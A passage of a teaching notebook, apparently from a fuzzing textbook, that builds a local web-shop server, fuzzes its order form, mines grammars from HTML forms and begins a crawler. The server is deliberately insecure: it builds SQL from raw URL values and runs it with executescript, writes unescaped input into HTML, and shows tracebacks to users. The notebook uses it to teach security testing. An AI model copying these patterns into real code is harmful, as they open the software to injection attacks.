SimpleHTTPRequestHandler(BaseHTTPRequestHandler): def do_GET(self): try: # print("GET " + self.path) if self.path == "/": self.send_order_form() elif self.path.startswith("/order"): self.handle_order() elif self.path.startswith("/terms"): self.send_terms_and_conditions() else: self.not_found() except Exception: self.internal_server_error() # + [markdown] slideshow={"slide_type": "subslide"} # #### Order Form # # Accessing the home page (i.e. getting the page at `/`) is simple: We go and serve the `html_order_form` as defined above. # + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def send_order_form(self): self.send_response(HTTPStatus.OK, "Place your order") self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(HTML_ORDER_FORM.encode("utf8")) # + [markdown] slideshow={"slide_type": "fragment"} # Likewise, we can send out the terms and conditions: # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def send_terms_and_conditions(self): self.send_response(HTTPStatus.OK, "Terms and Conditions") self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(HTML_TERMS_AND_CONDITIONS.encode("utf8")) # + [markdown] slideshow={"slide_type": "subslide"} # #### Processing Orders # + [markdown] slideshow={"slide_type": "subslide"} # When the user clicks `Submit` on the order form, the Web browser creates and retrieves a URL of the form # # ``` # <hostname>/order?field_1=value_1&field_2=value_2&field_3=value_3 # ``` # # where each `field_i` is the name of the field in the HTML form, and `value_i` is the value provided by the user. Values use the CGI encoding we have seen in the [chapter on coverage](Coverage.ipynb) – that is, spaces are converted into `+`, and characters that are not digits or letters are converted into `%nn`, where `nn` is the hexadecimal value of the character. # # If <NAME> <<EMAIL>> from Seattle orders a T-Shirt, this is the URL the browser creates: # # ``` # <hostname>/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104 # ``` # + [markdown] slideshow={"slide_type": "subslide"} # When processing a query, the attribute `self.path` of the HTTP request handler holds the path accessed – i.e., everything after `<hostname>`. The helper method `get_field_values()` takes `self.path` and returns a dictionary of values. # + slideshow={"slide_type": "skip"} import urllib.parse # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def get_field_values(self): # Note: this fails to decode non-ASCII characters properly query_string = urllib.parse.urlparse(self.path).query # fields is { 'item': ['tshirt'], 'name': ['<NAME>'], ...} fields = urllib.parse.parse_qs(query_string, keep_blank_values=True) values = {} for key in fields: values[key] = fields[key][0] return values # + [markdown] slideshow={"slide_type": "subslide"} # The method `handle_order()` takes these values from the URL, stores the order, and returns a page confirming the order. If anything goes wrong, it sends an internal server error. # + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def handle_order(self): values = self.get_field_values() self.store_order(values) self.send_order_received(values) # + [markdown] slideshow={"slide_type": "fragment"} # Storing the order makes use of the database connection defined above; we create an SQL command instantiated with the values as extracted from the URL. # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def store_order(self, values): db = sqlite3.connect(ORDERS_DB) # The following should be one line sql_command = "INSERT INTO orders VALUES ('{item}', '{name}', '{email}', '{city}', '{zip}')".format(**values) self.log_message("%s", sql_command) db.executescript(sql_command) db.commit() # + [markdown] slideshow={"slide_type": "fragment"} # After storing the order, we send the confirmation HTML page, which again is instantiated with the values from the URL. # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def send_order_received(self, values): # Should use html.escape() values["item_name"] = FUZZINGBOOK_SWAG[values["item"]] confirmation = HTML_ORDER_RECEIVED.format(**values).encode("utf8") self.send_response(HTTPStatus.OK, "Order received") self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(confirmation) # + [markdown] slideshow={"slide_type": "subslide"} # #### Other HTTP commands # # Besides the `GET` command (which does all the heavy lifting), HTTP servers can also support other HTTP commands; we support the `HEAD` command, which returns the head information of a Web page. In our case, this is always empty. # + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def do_HEAD(self): # print("HEAD " + self.path) self.send_response(HTTPStatus.OK) self.send_header("Content-type", "text/html") self.end_headers() # + [markdown] slideshow={"slide_type": "subslide"} # ### Error Handling # # We have defined pages for submitting and processing orders; now we also need a few pages for errors that might occur. # + [markdown] slideshow={"slide_type": "subslide"} # #### Page Not Found # # This page is displayed if a non-existing page (i.e. anything except `/` or `/order`) is requested. # + slideshow={"slide_type": "fragment"} HTML_NOT_FOUND = """ <html><body> <div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Sorry.</strong> <p> This page does not exist. Try our <a href="/">order form</a> instead. </p> </div> </body></html> """ # + slideshow={"slide_type": "subslide"} HTML(HTML_NOT_FOUND) # + [markdown] slideshow={"slide_type": "fragment"} # The method `not_found()` takes care of sending this out with the appropriate HTTP status code. # + slideshow={"slide_type": "fragment"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def not_found(self): self.send_response(HTTPStatus.NOT_FOUND, "Not found") self.send_header("Content-type", "text/html") self.end_headers() message = HTML_NOT_FOUND self.wfile.write(message.encode("utf8")) # + [markdown] slideshow={"slide_type": "subslide"} # #### Internal Errors # # This page is shown for any internal errors that might occur. For diagnostic purposes, we have it include the traceback of the failing function. # + slideshow={"slide_type": "subslide"} HTML_INTERNAL_SERVER_ERROR = """ <html><body> <div style="border:3px; border-style:solid; border-color:#FF0000; padding: 1em;"> <strong id="title" style="font-size: x-large">Internal Server Error</strong> <p> The server has encountered an internal error. Go to our <a href="/">order form</a>. <pre>{error_message}</pre> </p> </div> </body></html> """ # + slideshow={"slide_type": "fragment"} HTML(HTML_INTERNAL_SERVER_ERROR) # + slideshow={"slide_type": "skip"} import sys import traceback # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def internal_server_error(self): self.send_response(HTTPStatus.INTERNAL_SERVER_ERROR, "Internal Error") self.send_header("Content-type", "text/html") self.end_headers() exc = traceback.format_exc() self.log_message("%s", exc.strip()) message = HTML_INTERNAL_SERVER_ERROR.format(error_message=exc) self.wfile.write(message.encode("utf8")) # + [markdown] slideshow={"slide_type": "subslide"} # ### Logging # # Our server runs as a separate process in the background, waiting to receive commands at all time. To see what it is doing, we implement a special logging mechanism. The `httpd_message_queue` establishes a queue into which one process (the server) can store Python objects, and in which another process (the notebook) can retrieve them. We use this to pass log messages from the server, which we can then display in the notebook. # + slideshow={"slide_type": "skip"} from multiprocessing import Queue # + slideshow={"slide_type": "fragment"} HTTPD_MESSAGE_QUEUE = Queue() # + [markdown] slideshow={"slide_type": "fragment"} # Let us place two messages in the queue: # + slideshow={"slide_type": "fragment"} HTTPD_MESSAGE_QUEUE.put("I am another message") # + slideshow={"slide_type": "fragment"} HTTPD_MESSAGE_QUEUE.put("I am one more message") # + [markdown] slideshow={"slide_type": "fragment"} # To distinguish server messages from other parts of the notebook, we format them specially: # + slideshow={"slide_type": "skip"} from bookutils import rich_output, terminal_escape # + slideshow={"slide_type": "subslide"} def display_httpd_message(message): if rich_output(): display( HTML( '<pre style="background: NavajoWhite;">' + message + "</pre>")) else: print(terminal_escape(message)) # + slideshow={"slide_type": "fragment"} display_httpd_message("I am a httpd server message") # + [markdown] slideshow={"slide_type": "fragment"} # The method `print_httpd_messages()` prints all messages accumulated in the queue so far: # + slideshow={"slide_type": "subslide"} def print_httpd_messages(): while not HTTPD_MESSAGE_QUEUE.empty(): message = HTTPD_MESSAGE_QUEUE.get() display_httpd_message(message) # + slideshow={"slide_type": "skip"} import time # + slideshow={"slide_type": "fragment"} time.sleep(1) print_httpd_messages() # + [markdown] slideshow={"slide_type": "fragment"} # With `clear_httpd_messages()`, we can silently discard all pending messages: # + slideshow={"slide_type": "fragment"} def clear_httpd_messages(): while not HTTPD_MESSAGE_QUEUE.empty(): HTTPD_MESSAGE_QUEUE.get() # + [markdown] slideshow={"slide_type": "fragment"} # The method `log_message()` in the request handler makes use of the queue to store its messages: # + slideshow={"slide_type": "subslide"} class SimpleHTTPRequestHandler(SimpleHTTPRequestHandler): def log_message(self, format, *args): message = ("%s - - [%s] %s\n" % (self.address_string(), self.log_date_time_string(), format % args)) HTTPD_MESSAGE_QUEUE.put(message) # + [markdown] slideshow={"slide_type": "fragment"} # In [the chapter on carving](Carver.ipynb), we had introduced a `webbrowser()` method which retrieves the contents of the given URL. We now extend it such that it also prints out any log messages produced by the server: # + slideshow={"slide_type": "skip"} import requests # + slideshow={"slide_type": "subslide"} def webbrowser(url, mute=False): """Download the http/https resource given by the URL""" import requests # for imports try: r = requests.get(url) contents = r.text finally: if not mute: print_httpd_messages() else: clear_httpd_messages() return contents # + [markdown] slideshow={"slide_type": "subslide"} # ### Running the Server # # After all these definitions, we are now ready to get the Web server up and running. We run the server on the *local host* – that is, the same machine which also runs this notebook. We check for an accessible port and put the resulting URL in the queue created earlier. # + button=false new_sheet=false run_control={"read_only": false} slideshow={"slide_type": "skip"} def run_httpd_forever(handler_class): host = "127.0.0.1" # localhost IP for port in range(8800, 9000): httpd_address = (host, port) try: httpd = HTTPServer(httpd_address, handler_class) break except OSError: continue httpd_url = "http://" + host + ":" + repr(port) HTTPD_MESSAGE_QUEUE.put(httpd_url) httpd.serve_forever() # + [markdown] slideshow={"slide_type": "subslide"} # The function `start_httpd()` starts the server in a separate process, which we start using the `multiprocessing` module. It retrieves its URL from the message queue and returns it, such that we can start talking to the server. # + slideshow={"slide_type": "skip"} from multiprocessing import Process # + slideshow={"slide_type": "fragment"} def start_httpd(handler_class=SimpleHTTPRequestHandler): clear_httpd_messages() httpd_process = Process(target=run_httpd_forever, args=(handler_class,)) httpd_process.start() httpd_url = HTTPD_MESSAGE_QUEUE.get() return httpd_process, httpd_url # + [markdown] slideshow={"slide_type": "fragment"} # Let us now start the server and save its URL: # + slideshow={"slide_type": "subslide"} httpd_process, httpd_url = start_httpd() httpd_url # + [markdown] slideshow={"slide_type": "subslide"} # ### Interacting with the Server # # Let us now access the server just created. # + [markdown] slideshow={"slide_type": "subslide"} # #### Direct Browser Access # # If you are running the Jupyter notebook server on the local host as well, you can now access the server directly at the given URL. Simply open the address in `httpd_url` by clicking on the link below. # # **Note**: This only works if you are running the Jupyter notebook server on the local host. # + slideshow={"slide_type": "fragment"} def print_url(url): if rich_output(): display(HTML('<pre><a href="%s">%s</a></pre>' % (url, url))) else: print(terminal_escape(url)) # + slideshow={"slide_type": "subslide"} print_url(httpd_url) # + [markdown] slideshow={"slide_type": "fragment"} # Even more convenient, you may be able to interact directly with the server using the window below. # # **Note**: This only works if you are running the Jupyter notebook server on the local host. # + slideshow={"slide_type": "fragment"} HTML('<iframe src="' + httpd_url + '" ' + 'width="100%" height="230"></iframe>') # + [markdown] slideshow={"slide_type": "fragment"} # After interaction, you can retrieve the messages produced by the server: # + slideshow={"slide_type": "subslide"} print_httpd_messages() # + [markdown] slideshow={"slide_type": "fragment"} # We can also see any orders placed in the database: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "fragment"} # And we can clear the order database: # + slideshow={"slide_type": "fragment"} db.execute("DELETE FROM orders") db.commit() # + [markdown] slideshow={"slide_type": "subslide"} # #### Retrieving the Home Page # # Even if our browser cannot directly interact with the server, the _notebook_ can. We can, for instance, retrieve the contents of the home page and display them: # + slideshow={"slide_type": "fragment"} contents = webbrowser(httpd_url) # + slideshow={"slide_type": "fragment"} HTML(contents) # + [markdown] slideshow={"slide_type": "subslide"} # #### Placing Orders # # To test this form, we can generate URLs with orders and have the server process them. # + [markdown] slideshow={"slide_type": "fragment"} # The method `urljoin()` puts together a base URL (i.e., the URL of our server) and a path – say, the path towards our order. # + slideshow={"slide_type": "skip"} from urllib.parse import urljoin, urlsplit # + slideshow={"slide_type": "fragment"} urljoin(httpd_url, "/order?foo=bar") # + [markdown] slideshow={"slide_type": "fragment"} # With `urljoin()`, we can create a full URL that is the same as the one generated by the browser as we submit the order form. Sending this URL to the browser effectively places the order, as we can see in the server log produced: # + slideshow={"slide_type": "subslide"} contents = webbrowser(urljoin(httpd_url, "/order?item=tshirt&name=Jane+Doe&email=doe%40example.com&city=Seattle&zip=98104")) # + [markdown] slideshow={"slide_type": "fragment"} # The web page returned confirms the order: # + slideshow={"slide_type": "fragment"} HTML(contents) # + [markdown] slideshow={"slide_type": "fragment"} # And the order is in the database, too: # + slideshow={"slide_type": "fragment"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # #### Error Messages # # We can also test whether the server correctly responds to invalid requests. Nonexistent pages, for instance, are correctly handled: # + slideshow={"slide_type": "fragment"} HTML(webbrowser(urljoin(httpd_url, "/some/other/path"))) # + [markdown] slideshow={"slide_type": "fragment"} # You may remember we also have a page for internal server errors. Can we get the server to produce this page? To find this out, we have to test the server thoroughly – which we do in the remainder of this chapter. # + [markdown] slideshow={"slide_type": "slide"} # ## Fuzzing Input Forms # # After setting up and starting the server, let us now go and systematically test it – first with expected, and then with less expected values. # + [markdown] slideshow={"slide_type": "subslide"} # ### Fuzzing with Expected Values # # Since placing orders is all done by creating appropriate URLs, we define a [grammar](Grammars.ipynb) `ORDER_GRAMMAR` which encodes ordering URLs. It comes with a few sample values for names, email addresses, cities and (random) digits. # + [markdown] slideshow={"slide_type": "fragment"} # To make it easier to define strings that become part of a URL, we define the function `cgi_encode()`, taking a string and autmatically encoding it into CGI: # + slideshow={"slide_type": "skip"} import string # + slideshow={"slide_type": "subslide"} def cgi_encode(s, do_not_encode=""): ret = "" for c in s: if (c in string.ascii_letters or c in string.digits or c in "$-_.+!*'()," or c in do_not_encode): ret += c elif c == ' ': ret += '+' else: ret += "%%%02x" % ord(c) return ret # + slideshow={"slide_type": "fragment"} s = cgi_encode('Is "DOW30" down .24%?') s # + [markdown] slideshow={"slide_type": "subslide"} # The optional parameter `do_not_encode` allows us to skip certain characters from encoding. This is useful when encoding grammar rules: # + slideshow={"slide_type": "fragment"} cgi_encode("<string>@<string>", "<>") # + [markdown] slideshow={"slide_type": "fragment"} # `cgi_encode()` is the exact counterpart of the `cgi_decode()` function defined in the [chapter on coverage](Coverage.ipynb): # + slideshow={"slide_type": "skip"} from Coverage import cgi_decode # minor dependency # + slideshow={"slide_type": "fragment"} cgi_decode(s) # + [markdown] slideshow={"slide_type": "fragment"} # Now for the grammar. We make use of `cgi_encode()` to encode strings: # + slideshow={"slide_type": "skip"} from Grammars import crange, is_valid_grammar, syntax_diagram # + slideshow={"slide_type": "subslide"} ORDER_GRAMMAR = { "<start>": ["<order>"], "<order>": ["/order?item=<item>&name=<name>&email=<email>&city=<city>&zip=<zip>"], "<item>": ["tshirt", "drill", "lockset"], "<name>": [cgi_encode("<NAME>"), cgi_encode("<NAME>")], "<email>": [cgi_encode("<EMAIL>"), cgi_encode("<EMAIL>")], "<city>": ["Seattle", cgi_encode("New York")], "<zip>": ["<digit>" * 5], "<digit>": crange('0', '9') } # + slideshow={"slide_type": "fragment"} assert is_valid_grammar(ORDER_GRAMMAR) # + slideshow={"slide_type": "subslide"} syntax_diagram(ORDER_GRAMMAR) # + [markdown] slideshow={"slide_type": "subslide"} # Using [one of our grammar fuzzers](GrammarFuzzer.iynb), we can instantiate this grammar and generate URLs: # + slideshow={"slide_type": "skip"} from GrammarFuzzer import GrammarFuzzer # + slideshow={"slide_type": "fragment"} order_fuzzer = GrammarFuzzer(ORDER_GRAMMAR) [order_fuzzer.fuzz() for i in range(5)] # + [markdown] slideshow={"slide_type": "fragment"} # Sending these URLs to the server will have them processed correctly: # + slideshow={"slide_type": "fragment"} HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz()))) # + slideshow={"slide_type": "subslide"} print(db.execute("SELECT * FROM orders").fetchall()) # + [markdown] slideshow={"slide_type": "subslide"} # ### Fuzzing with Unexpected Values # + [markdown] slideshow={"slide_type": "fragment"} # We can now see that the server does a good job when faced with "standard" values. But what happens if we feed it non-standard values? To this end, we make use of a [mutation fuzzer](MutationFuzzer.ipynb) which inserts random changes into the URL. Our seed (i.e. the value to be mutated) comes from the grammar fuzzer: # + slideshow={"slide_type": "fragment"} seed = order_fuzzer.fuzz() seed # + [markdown] slideshow={"slide_type": "fragment"} # Mutating this string yields mutations not only in the field values, but also in field names as well as the URL structure. # + slideshow={"slide_type": "skip"} from MutationFuzzer import MutationFuzzer # minor deoendency # + slideshow={"slide_type": "subslide"} mutate_order_fuzzer = MutationFuzzer([seed], min_mutations=1, max_mutations=1) [mutate_order_fuzzer.fuzz() for i in range(5)] # + [markdown] slideshow={"slide_type": "fragment"} # Let us fuzz a little until we get an internal server error. We use the Python `requests` module to interact with the Web server such that we can directly access the HTTP status code. # + slideshow={"slide_type": "subslide"} while True: path = mutate_order_fuzzer.fuzz() url = urljoin(httpd_url, path) r = requests.get(url) if r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR: break # + [markdown] slideshow={"slide_type": "fragment"} # That didn't take long. Here's the offending URL: # + slideshow={"slide_type": "fragment"} url # + slideshow={"slide_type": "fragment"} clear_httpd_messages() HTML(webbrowser(url)) # + [markdown] slideshow={"slide_type": "subslide"} # How does the URL cause this internal error? We make use of [delta debugging](Reducer.ipynb) to minimize the failure-inducing path, setting up a `WebRunner` class to define the failure condition: # + slideshow={"slide_type": "fragment"} failing_path = path failing_path # + slideshow={"slide_type": "skip"} from Fuzzer import Runner # + slideshow={"slide_type": "subslide"} class WebRunner(Runner): def __init__(self, base_url=None): self.base_url = base_url def run(self, url): if self.base_url is not None: url = urljoin(self.base_url, url) import requests # for imports r = requests.get(url) if r.status_code == HTTPStatus.OK: return url, Runner.PASS elif r.status_code == HTTPStatus.INTERNAL_SERVER_ERROR: return url, Runner.FAIL else: return url, Runner.UNRESOLVED # + slideshow={"slide_type": "subslide"} web_runner = WebRunner(httpd_url) web_runner.run(failing_path) # + [markdown] slideshow={"slide_type": "fragment"} # This is the minimized path: # + slideshow={"slide_type": "skip"} from Reducer import DeltaDebuggingReducer # minor # + slideshow={"slide_type": "fragment"} minimized_path = DeltaDebuggingReducer(web_runner).reduce(failing_path) minimized_path # + [markdown] slideshow={"slide_type": "fragment"} # It turns out that our server encounters an internal error if we do not supply the requested fields: # + slideshow={"slide_type": "fragment"} minimized_url = urljoin(httpd_url, minimized_path) minimized_url # + slideshow={"slide_type": "subslide"} clear_httpd_messages() HTML(webbrowser(minimized_url)) # + [markdown] slideshow={"slide_type": "fragment"} # We see that we might have a lot to do to make our Web server more robust against unexpected inputs. The [exercises](#Exercises) give some instructions on what to do. # + [markdown] slideshow={"slide_type": "slide"} # ## Extracting Grammars for Input Forms # # In our previous examples, we have assumed that we have a grammar that produces valid (or less valid) order queries. However, such a grammar does not need to be specified manually; we can also _extract it automatically_ from a Web page at hand. This way, we can apply our test generators on arbitrary Web forms without a manual specification step. # + [markdown] slideshow={"slide_type": "subslide"} # ### Searching HTML for Input Fields # # The key idea of our approach is to identify all input fields in a form. To this end, let us take a look at how the individual elements in our order form are encoded in HTML: # + slideshow={"slide_type": "subslide"} html_text = webbrowser(httpd_url) print(html_text[html_text.find("<form"):html_text.find("</form>") + len("</form>")]) # + [markdown] slideshow={"slide_type": "subslide"} # We see that there is a number of form elements that accept inputs, in particular `<input>`, but also `<select>` and `<option>`. The idea now is to _parse_ the HTML of the Web page in question, to extract these individual input elements, and then to create a _grammar_ that produces a matching URL, effectively filling out the form. # + [markdown] slideshow={"slide_type": "fragment"} # To parse the HTML page, we could define a grammar to parse HTML and make use of [our own parser infrastructure](Parser.ipynb). However, it is much easier to not reinvent the wheel and instead build on the existing, dedicated `HTMLParser` class from the Python library. # + slideshow={"slide_type": "skip"} from html.parser import HTMLParser # + [markdown] slideshow={"slide_type": "subslide"} # During parsing, we search for `<form>` tags and save the associated action (i.e., the URL to be invoked when the form is submitted) in the `action` attribute. While processing the form, we create a map `fields` that holds all input fields we have seen; it maps field names to the respective HTML input types (`"text"`, `"number"`, `"checkbox"`, etc.). Exclusive selection options map to a list of possible values; the `select` stack holds the currently active selection. # + slideshow={"slide_type": "fragment"} class FormHTMLParser(HTMLParser): def reset(self): super().reset() self.action = "" # Form action # Map of field name to type (or selection name to [option_1, option_2, # ...]) self.fields = {} self.select = [] # Stack of currently active selection names # + [markdown] slideshow={"slide_type": "subslide"} # While parsing, the parser calls `handle_starttag()` for every opening tag (such as `<form>`) found; conversely, it invokes `handle_endtag()` for closing tags (such as `</form>`). `attributes` gives us a map of associated attributes and values. # # Here is how we process the individual tags: # * When we find a `<form>` tag, we save the associated action in the `action` attribute; # * When we find an `<input>` tag or similar, we save the type in the `fields` attribute; # * When we find a `<select>` tag or similar, we push its name on the `select` stack; # * When we find an `<option>` tag, we append the option to the list associated with the last pushed `<select>` tag. # + slideshow={"slide_type": "subslide"} class FormHTMLParser(FormHTMLParser): def handle_starttag(self, tag, attrs): attributes = {attr_name: attr_value for attr_name, attr_value in attrs} # print(tag, attributes) if tag == "form": self.action = attributes.get("action", "") elif tag == "select" or tag == "datalist": if "name" in attributes: name = attributes["name"] self.fields[name] = [] self.select.append(name) else: self.select.append(None) elif tag == "option" and "multiple" not in attributes: current_select_name = self.select[-1] if current_select_name is not None and "value" in attributes: self.fields[current_select_name].append(attributes["value"]) elif tag == "input" or tag == "option" or tag == "textarea": if "name" in attributes: name = attributes["name"] self.fields[name] = attributes.get("type", "text") elif tag == "button": if "name" in attributes: name = attributes["name"] self.fields[name] = [""] # + slideshow={"slide_type": "subslide"} class FormHTMLParser(FormHTMLParser): def handle_endtag(self, tag): if tag == "select": self.select.pop() # + [markdown] slideshow={"slide_type": "fragment"} # Our implementation handles only one form per Web page; it also works on HTML only, ignoring all interaction coming from JavaScript. Also, it does not support all HTML input types. # + [markdown] slideshow={"slide_type": "fragment"} # Let us put this parser to action. We create a class `HTMLGrammarMiner` that takes a HTML document to parse. It then returns the associated action and the associated fields: # + slideshow={"slide_type": "subslide"} class HTMLGrammarMiner(object): def __init__(self, html_text): html_parser = FormHTMLParser() html_parser.feed(html_text) self.fields = html_parser.fields self.action = html_parser.action # + [markdown] slideshow={"slide_type": "fragment"} # Applied on our order form, this is what we get: # + slideshow={"slide_type": "fragment"} html_miner = HTMLGrammarMiner(html_text) html_miner.action # + slideshow={"slide_type": "subslide"} html_miner.fields # + [markdown] slideshow={"slide_type": "fragment"} # From this structure, we can now generate a grammar that automatically produces valid form submission URLs. # + [markdown] slideshow={"slide_type": "subslide"} # ### Mining Grammars for Web Pages # + [markdown] slideshow={"slide_type": "fragment"} # To create a grammar from the fields extracted from HTML, we build on the `CGI_GRAMMAR` defined in the [chapter on grammars](Grammars.ipynb). The key idea is to define rules for every HTML input type: An HTML `number` type will get values from the `<number>` rule; likewise, values for the HTML `email` type will be defined from the `<email>` rule. Our default grammar provides very simple rules for these types. # + slideshow={"slide_type": "skip"} from Grammars import crange, srange, new_symbol, unreachable_nonterminals, CGI_GRAMMAR, extend_grammar # + slideshow={"slide_type": "subslide"} class HTMLGrammarMiner(HTMLGrammarMiner): QUERY_GRAMMAR = extend_grammar(CGI_GRAMMAR, { "<start>": ["<action>?<query>"], "<text>": ["<string>"], "<number>": ["<digits>"], "<digits>": ["<digit>", "<digits><digit>"], "<digit>": crange('0', '9'), "<checkbox>": ["<_checkbox>"], "<_checkbox>": ["on", "off"], "<email>": ["<_email>"], "<_email>": [cgi_encode("<string>@<string>", "<>")], # Use a fixed password in case we need to repeat it "<password>": ["<_password>"], "<_password>": ["<PASSWORD>"], # Stick to printable characters to avoid logging problems "<percent>": ["%<hexdigit-1><hexdigit>"], "<hexdigit-1>": srange("34567"), # Submissions: "<submit>": [""] }) # + [markdown] slideshow={"slide_type": "subslide"} # Our grammar miner now takes the fields extracted from HTML, converting them into rules. Essentially, every input field encountered gets included in the resulting query URL; and it gets a rule expanding it into the appropriate type. # + slideshow={"slide_type": "subslide"} class HTMLGrammarMiner(HTMLGrammarMiner): def mine_grammar(self): grammar = extend_grammar(self.QUERY_GRAMMAR) grammar["<action>"] = [self.action] query = "" for field in self.fields: field_symbol = new_symbol(grammar, "<" + field + ">") field_type = self.fields[field] if query != "": query += "&" query += field_symbol if isinstance(field_type, str): field_type_symbol = "<" + field_type + ">" grammar[field_symbol] = [field + "=" + field_type_symbol] if field_type_symbol not in grammar: # Unknown type grammar[field_type_symbol] = ["<text>"] else: # List of values value_symbol = new_symbol(grammar, "<" + field + "-value>") grammar[field_symbol] = [field + "=" + value_symbol] grammar[value_symbol] = field_type grammar["<query>"] = [query] # Remove unused parts for nonterminal in unreachable_nonterminals(grammar): del grammar[nonterminal] assert is_valid_grammar(grammar) return grammar # + [markdown] slideshow={"slide_type": "subslide"} # Let us show `HTMLGrammarMiner` in action, again applied on our order form. Here is the full resulting grammar: # + slideshow={"slide_type": "subslide"} html_miner = HTMLGrammarMiner(html_text) grammar = html_miner.mine_grammar() grammar # + [markdown] slideshow={"slide_type": "subslide"} # Let us take a look into the structure of the grammar. It produces URL paths of this form: # + slideshow={"slide_type": "fragment"} grammar["<start>"] # + [markdown] slideshow={"slide_type": "fragment"} # Here, the `<action>` comes from the `action` attribute of the HTML form: # + slideshow={"slide_type": "fragment"} grammar["<action>"] # + [markdown] slideshow={"slide_type": "fragment"} # The `<query>` is composed from the individual field items: # + slideshow={"slide_type": "fragment"} grammar["<query>"] # + [markdown] slideshow={"slide_type": "fragment"} # Each of these fields has the form `<field-name>=<field-type>`, where `<field-type>` is already defined in the grammar: # + slideshow={"slide_type": "fragment"} grammar["<zip>"] # + slideshow={"slide_type": "subslide"} grammar["<terms>"] # + [markdown] slideshow={"slide_type": "fragment"} # These are the query URLs produced from the grammar. We see that these are similar to the ones produced from our hand-crafted grammar, except that the string values for names, email addresses, and cities are now completely random: # + slideshow={"slide_type": "fragment"} order_fuzzer = GrammarFuzzer(grammar) [order_fuzzer.fuzz() for i in range(3)] # + [markdown] slideshow={"slide_type": "fragment"} # We can again feed these directly into our Web browser: # + slideshow={"slide_type": "subslide"} HTML(webbrowser(urljoin(httpd_url, order_fuzzer.fuzz()))) # + [markdown] slideshow={"slide_type": "fragment"} # We see (one more time) that we can mine a grammar automatically from given data. # + [markdown] slideshow={"slide_type": "subslide"} # ### A Fuzzer for Web Forms # # To make things most convenient, let us define a `WebFormFuzzer` class that does everything in one place. Given a URL, it extracts its HTML content, mines the grammar and then produces inputs for it. # + slideshow={"slide_type": "subslide"} class WebFormFuzzer(GrammarFuzzer): def __init__(self, url, **grammar_fuzzer_options): html_text = self.get_html(url) grammar = self.get_grammar(html_text) super().__init__(grammar, **grammar_fuzzer_options) def get_html(self, url): return requests.get(url).text def get_grammar(self, html_text): grammar_miner = HTMLGrammarMiner(html_text) return grammar_miner.mine_grammar() # + [markdown] slideshow={"slide_type": "fragment"} # All it now takes to fuzz a Web form is to provide its URL: # + slideshow={"slide_type": "subslide"} web_form_fuzzer = WebFormFuzzer(httpd_url) web_form_fuzzer.fuzz() # + [markdown] slideshow={"slide_type": "fragment"} # We can combine the fuzzer with a `WebRunner` as defined above to run the resulting fuzz inputs directly on our Web server: # + slideshow={"slide_type": "subslide"} web_form_runner = WebRunner(httpd_url) web_form_fuzzer.runs(web_form_runner, 10) # + [markdown] slideshow={"slide_type": "subslide"} # While convenient to use, this fuzzer is still very rudimentary: # # * It is limited to one form per page. # * It only supports `GET` actions (i.e., inputs encoded into the URL). A full Web form fuzzer would have to at least support `POST` actions. # * The fuzzer is build on HTML only. There is no Javascript handling for dynamic Web pages. # + [markdown] slideshow={"slide_type": "fragment"} # Let us clear any pending messages before we get to the next section: # + slideshow={"slide_type": "fragment"} clear_httpd_messages() # + [markdown] slideshow={"slide_type": "slide"} # ## Crawling User Interfaces # # # + [markdown] slideshow={"slide_type": "fragment"} # So far, we have assumed there would be only one form to explore. A real Web server, of course, has several pages – and possibly several forms, too. We define a simple *crawler* that explores all the links that originate from one page. # + [markdown] slideshow={"slide_type": "subslide"} # Our crawler is pretty straightforward. Its main component is again a `HTMLParser` that analyzes the HTML code for links of the form # # ```html # <a href="<link>"> # ``` # # and saves all the links found in a list called `links`. # + slideshow={"slide_type": "subslide"} class LinkHTMLParser(HTMLParser): def reset(self): super().reset() self.links = [] def handle_starttag(self, tag, attrs): attributes = {attr_name: attr_value for attr_name, attr_value in attrs} if tag == "a" and "href" in attributes: # print("Found:", tag, attributes) self.links.append(attributes["href"]) # + [markdown] slideshow={"slide_type": "subslide"} # The actual crawler comes as a _generator function_ `crawl()` which produces one URL after another. By default, it returns only URLs that reside on the same host; the parameter `max_pages` controls how many pages (default: 1) should be scanned. We also respect the `robots.txt` file on the remote site to check which pages we are allowed to scan. # + slideshow={"slide_type": "skip"} from collections import deque import urllib.robotparser # + slideshow={"slide_type": "subslide"} def crawl(url, max_pages=1, same_host=True): """Return the list of linked URLs from the given URL. Accesses up to `max_pages`.""" pages = deque([(url, "<param>")]) urls_seen = set() rp = urllib.robotparser.RobotFileParser() rp.set_url(urljoin(url, "/robots.txt")) rp.read() while len(pages) > 0 and max_pages > 0: page, referrer = pages.popleft() if not rp.can_fetch("*", page): # Disallowed by robots.txt continue r = requests.get(page) max_pages -= 1 if r.status_code != HTTPStatus.OK: print("Error " + repr(r.status_code) + ": " + page, "(referenced from " + referrer + ")", file=sys.stderr) continue content_type = r.headers["content-type"] if not content_type.startswith("text/html"): continue parser = LinkHTMLParser() parser.feed(r.text) for link in parser.links: target_url = urljoin(page, link) if same_host and urlsplit( target_url).hostname != urlsplit(url).hostname: # Different host continue if urlsplit(target_url).fragment != "": # Ignore #fragments continue if target_url not in urls_seen: pages.append((target_url, page)) urls_seen.add(target_url) yield target_url if page not in urls_seen: urls_seen.add(page) yield page # + [markdown] 